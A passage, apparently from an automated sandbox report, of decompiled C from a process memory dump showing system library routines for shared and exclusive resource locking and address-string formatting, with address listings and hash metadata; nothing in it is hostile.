                                                                                        			E00AB0554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00b501c0;
									_push(_t144);
									_push(0);
									_t51 = E00A6F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E00AB4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E00AC3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E00AC3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E00AF217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00AC3F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E00AB3915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00b501c0;
												_push(_t138);
												_push(0);
												_t58 = E00A6F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E00AB4FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E00AC3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E00AC3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E00AF217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E00AC3F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E00AB3915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00A95384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E00A6F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E00AB3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E00A6F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E00AB3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E00A6F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E00AB3915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L58;
																}
																E00A95329(_t110, _t138);
																return E00A953A5(_t138, 1);
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L58;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L58;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L58;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L58:
			}



































                                                                                        0x00ab055a
                                                                                        0x00ab055d
                                                                                        0x00ab0563
                                                                                        0x00ab0566
                                                                                        0x00ab05d8
                                                                                        0x00ab05e2
                                                                                        0x00ab05e5
                                                                                        0x00000000
                                                                                        0x00ab05e7
                                                                                        0x00ab05e7
                                                                                        0x00ab05ea
                                                                                        0x00ab05f3
                                                                                        0x00ab05f3
                                                                                        0x00ab0568
                                                                                        0x00ab0568
                                                                                        0x00ab0568
                                                                                        0x00ab0569
                                                                                        0x00ab0569
                                                                                        0x00ab0569
                                                                                        0x00ab056b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ad217f
                                                                                        0x00ad2183
                                                                                        0x00ad225b
                                                                                        0x00ad225f
                                                                                        0x00ad2189
                                                                                        0x00ad218c
                                                                                        0x00ad218f
                                                                                        0x00ad2194
                                                                                        0x00ad2199
                                                                                        0x00ad219d
                                                                                        0x00ad21a0
                                                                                        0x00ad21a2
                                                                                        0x00ad21ce
                                                                                        0x00ad21ce
                                                                                        0x00ad21ce
                                                                                        0x00ad21d0
                                                                                        0x00ad21d6
                                                                                        0x00ad21de
                                                                                        0x00ad21e2
                                                                                        0x00ad21e8
                                                                                        0x00ad21e9
                                                                                        0x00ad21ec
                                                                                        0x00ad21f1
                                                                                        0x00ad21f6
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ad21f8
                                                                                        0x00ad21fb
                                                                                        0x00ad2206
                                                                                        0x00ad220b
                                                                                        0x00ad220c
                                                                                        0x00ad2217
                                                                                        0x00ad2226
                                                                                        0x00ad222b
                                                                                        0x00ad222c
                                                                                        0x00ad222f
                                                                                        0x00ad2232
                                                                                        0x00ad2235
                                                                                        0x00ad2235
                                                                                        0x00ad223a
                                                                                        0x00ad223f
                                                                                        0x00ad2241
                                                                                        0x00ad2243
                                                                                        0x00ad2248
                                                                                        0x00ad2248
                                                                                        0x00ad224d
                                                                                        0x00ad224f
                                                                                        0x00ad2262
                                                                                        0x00ad2263
                                                                                        0x00ad2268
                                                                                        0x00ad2269
                                                                                        0x00ad2269
                                                                                        0x00ad2269
                                                                                        0x00ad226d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ad2276
                                                                                        0x00ad2279
                                                                                        0x00ad227e
                                                                                        0x00ad2283
                                                                                        0x00ad2287
                                                                                        0x00ad228a
                                                                                        0x00ad228d
                                                                                        0x00ad228f
                                                                                        0x00ad22bc
                                                                                        0x00ad22bc
                                                                                        0x00ad22bc
                                                                                        0x00ad22be
                                                                                        0x00ad22c4
                                                                                        0x00ad22cc
                                                                                        0x00ad22d0
                                                                                        0x00ad22d6
                                                                                        0x00ad22d7
                                                                                        0x00ad22da
                                                                                        0x00ad22df
                                                                                        0x00ad22e4
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ad22e6
                                                                                        0x00ad22e9
                                                                                        0x00ad22f4
                                                                                        0x00ad22f9
                                                                                        0x00ad22fa
                                                                                        0x00ad2305
                                                                                        0x00ad2314
                                                                                        0x00ad2319
                                                                                        0x00ad231a
                                                                                        0x00ad231d
                                                                                        0x00ad2320
                                                                                        0x00ad2323
                                                                                        0x00ad2323
                                                                                        0x00ad2328
                                                                                        0x00ad232d
                                                                                        0x00ad232f
                                                                                        0x00ad2331
                                                                                        0x00ad2336
                                                                                        0x00ad2336
                                                                                        0x00ad233b
                                                                                        0x00ad233d
                                                                                        0x00ad2350
                                                                                        0x00ad2351
                                                                                        0x00ad2356
                                                                                        0x00ad2359
                                                                                        0x00ad2359
                                                                                        0x00ad235b
                                                                                        0x00ad235d
                                                                                        0x00a95367
                                                                                        0x00a9536b
                                                                                        0x00a95372
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ad2363
                                                                                        0x00ad2363
                                                                                        0x00ad2369
                                                                                        0x00ad236a
                                                                                        0x00ad236c
                                                                                        0x00ad2371
                                                                                        0x00ad2373
                                                                                        0x00000000
                                                                                        0x00ad2379
                                                                                        0x00ad2379
                                                                                        0x00ad237a
                                                                                        0x00ad237f
                                                                                        0x00ad237f
                                                                                        0x00ad2385
                                                                                        0x00ad2386
                                                                                        0x00ad2389
                                                                                        0x00ad238e
                                                                                        0x00ad2390
                                                                                        0x00a95378
                                                                                        0x00a9537c
                                                                                        0x00ad2396
                                                                                        0x00ad2396
                                                                                        0x00ad2397
                                                                                        0x00ad239c
                                                                                        0x00ad23a2
                                                                                        0x00ad23a3
                                                                                        0x00ad23a6
                                                                                        0x00ad23ab
                                                                                        0x00ad23ad
                                                                                        0x00000000
                                                                                        0x00ad23b3
                                                                                        0x00ad23b3
                                                                                        0x00ad23b4
                                                                                        0x00ad23b9
                                                                                        0x00ad23ba
                                                                                        0x00ad23ba
                                                                                        0x00ad23bc
                                                                                        0x00ad23bf
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ac9153
                                                                                        0x00ac9158
                                                                                        0x00ac915a
                                                                                        0x00ac915e
                                                                                        0x00ac9160
                                                                                        0x00000000
                                                                                        0x00ac9166
                                                                                        0x00ac9166
                                                                                        0x00ac9171
                                                                                        0x00ac9176
                                                                                        0x00ac9176
                                                                                        0x00000000
                                                                                        0x00ac9160
                                                                                        0x00ad23c6
                                                                                        0x00ad23d7
                                                                                        0x00ad23d7
                                                                                        0x00ad23ad
                                                                                        0x00ad2390
                                                                                        0x00ad2373
                                                                                        0x00ad233f
                                                                                        0x00ad233f
                                                                                        0x00000000
                                                                                        0x00ad233f
                                                                                        0x00ad2291
                                                                                        0x00ad2291
                                                                                        0x00ad2293
                                                                                        0x00ad2295
                                                                                        0x00ad229a
                                                                                        0x00ad22a1
                                                                                        0x00ad22a3
                                                                                        0x00ad22a7
                                                                                        0x00ad22a9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ad22ab
                                                                                        0x00ad22ad
                                                                                        0x00ad22af
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ad22af
                                                                                        0x00ad22b1
                                                                                        0x00ad22b4
                                                                                        0x00ad22b4
                                                                                        0x00ad22b6
                                                                                        0x00a953be
                                                                                        0x00a953be
                                                                                        0x00a953be
                                                                                        0x00a953c0
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00a953cb
                                                                                        0x00a953ce
                                                                                        0x00a953d0
                                                                                        0x00a953d4
                                                                                        0x00a953d6
                                                                                        0x00000000
                                                                                        0x00a953d8
                                                                                        0x00a953e3
                                                                                        0x00a953ea
                                                                                        0x00a953ea
                                                                                        0x00000000
                                                                                        0x00a953d6
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ad22b6
                                                                                        0x00000000
                                                                                        0x00ad228f
                                                                                        0x00ad2349
                                                                                        0x00ad234d
                                                                                        0x00ad2251
                                                                                        0x00ad2251
                                                                                        0x00000000
                                                                                        0x00ad2251
                                                                                        0x00ad21a4
                                                                                        0x00ad21a4
                                                                                        0x00ad21a6
                                                                                        0x00ad21a8
                                                                                        0x00ad21ac
                                                                                        0x00ad21b6
                                                                                        0x00ad21b8
                                                                                        0x00ad21bc
                                                                                        0x00ad21be
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ad21c0
                                                                                        0x00ad21c2
                                                                                        0x00ad21c4
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ad21c4
                                                                                        0x00ad21c6
                                                                                        0x00ad21c6
                                                                                        0x00ad21c8
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ad21c8
                                                                                        0x00ad21a2
                                                                                        0x00000000
                                                                                        0x00ad2183
                                                                                        0x00ab057b
                                                                                        0x00ab057d
                                                                                        0x00ab0581
                                                                                        0x00ab0583
                                                                                        0x00ad2178
                                                                                        0x00000000
                                                                                        0x00ab0589
                                                                                        0x00ab058f
                                                                                        0x00ab058f
                                                                                        0x00ab0583
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AD2206
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                        • API String ID: 885266447-4236105082
                                                                                        • Opcode ID: 85af7e9114e9fec68c2407062f64ffa0db9f78defb36c103ec9f307467efee1e
                                                                                        • Instruction ID: 1bd93c8488373b71905e1c8b4630c2df579ce163bbfd0c77ee2a0a865f7c9e53
                                                                                        • Opcode Fuzzy Hash: 85af7e9114e9fec68c2407062f64ffa0db9f78defb36c103ec9f307467efee1e
                                                                                        • Instruction Fuzzy Hash: 2851FC327042116FDB159B14CC81FA673A9AFA8720F21C66AFD5ADF386DA71EC41C790
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AB14C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 64%
                                                                                        			E00AB14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0xb52088; // 0x77499e17
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E00AA7707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E00AB13CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E00AA7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E00AA7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E00A72340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E00A7E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                                                        0x00ab14c0
                                                                                        0x00ab14cb
                                                                                        0x00ab14d2
                                                                                        0x00ab14d6
                                                                                        0x00ab14da
                                                                                        0x00ab14de
                                                                                        0x00ab14e3
                                                                                        0x00ab157a
                                                                                        0x00ab157a
                                                                                        0x00ab14f1
                                                                                        0x00ab14f3
                                                                                        0x00adea0f
                                                                                        0x00000000
                                                                                        0x00adea15
                                                                                        0x00000000
                                                                                        0x00adea15
                                                                                        0x00ab14f9
                                                                                        0x00ab14f9
                                                                                        0x00ab14fe
                                                                                        0x00ab1504
                                                                                        0x00adea1a
                                                                                        0x00adea1f
                                                                                        0x00adea21
                                                                                        0x00adea22
                                                                                        0x00adea27
                                                                                        0x00adea2a
                                                                                        0x00adea2a
                                                                                        0x00ab1515
                                                                                        0x00ab1517
                                                                                        0x00ab156d
                                                                                        0x00ab1572
                                                                                        0x00ab1575
                                                                                        0x00ab1575
                                                                                        0x00ab151e
                                                                                        0x00adea50
                                                                                        0x00adea55
                                                                                        0x00adea58
                                                                                        0x00adea58
                                                                                        0x00ab152e
                                                                                        0x00ab1531
                                                                                        0x00ab1533
                                                                                        0x00000000
                                                                                        0x00ab1535
                                                                                        0x00ab1541
                                                                                        0x00ab1549
                                                                                        0x00ab1549
                                                                                        0x00ab1533
                                                                                        0x00ab14f3
                                                                                        0x00ab1559

                                                                                        APIs
                                                                                        • ___swprintf_l.LIBCMT ref: 00ADEA22
                                                                                          • Part of subcall function 00AB13CB: ___swprintf_l.LIBCMT ref: 00AB146B
                                                                                          • Part of subcall function 00AB13CB: ___swprintf_l.LIBCMT ref: 00AB1490
                                                                                        • ___swprintf_l.LIBCMT ref: 00AB156D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: ___swprintf_l
                                                                                        • String ID: %%%u$]:%u
                                                                                        • API String ID: 48624451-3050659472
                                                                                        • Opcode ID: 6a5454181616635a1f7acfe7fe69692efcdc65e5c4678d64dedfafbea179ccc2
                                                                                        • Instruction ID: 3e4ed00255f70ca0db467dfbb1e8b9f7557caccd607026d6cbaab95e543ba714
                                                                                        • Opcode Fuzzy Hash: 6a5454181616635a1f7acfe7fe69692efcdc65e5c4678d64dedfafbea179ccc2
                                                                                        • Instruction Fuzzy Hash: F521C372900219ABCB30DF54CD51AEF73BCBB50701F848552FC4AD7142DB70AA598BE0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00A953A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 44%
                                                                                        			E00A953A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x00b501c0;
									_push(_t92);
									_push(0);
									_t37 = E00A6F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E00AB4FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E00AC3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E00AC3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E00AF217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00AC3F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E00AB3915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E00A95384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E00A6F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E00AB3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E00A6F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E00AB3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E00A6F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E00AB3915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L37;
													}
													E00A95329(_t74, _t92);
													_push(1);
													return E00A953A5(_t92);
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L37;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L37:
			}

























                                                                                        0x00a953ab
                                                                                        0x00a953ae
                                                                                        0x00a953b1
                                                                                        0x00a953b4
                                                                                        0x00a953b7
                                                                                        0x00ab05b6
                                                                                        0x00ab05c0
                                                                                        0x00ab05c3
                                                                                        0x00000000
                                                                                        0x00ab05c9
                                                                                        0x00ab05c9
                                                                                        0x00ab05cc
                                                                                        0x00ab05d5
                                                                                        0x00ab05d5
                                                                                        0x00a953bd
                                                                                        0x00a953bd
                                                                                        0x00a953bd
                                                                                        0x00a953be
                                                                                        0x00a953be
                                                                                        0x00a953be
                                                                                        0x00a953c0
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ad2269
                                                                                        0x00ad226d
                                                                                        0x00ad2349
                                                                                        0x00ad234d
                                                                                        0x00ad2273
                                                                                        0x00ad2276
                                                                                        0x00ad2279
                                                                                        0x00ad227e
                                                                                        0x00ad2283
                                                                                        0x00ad2287
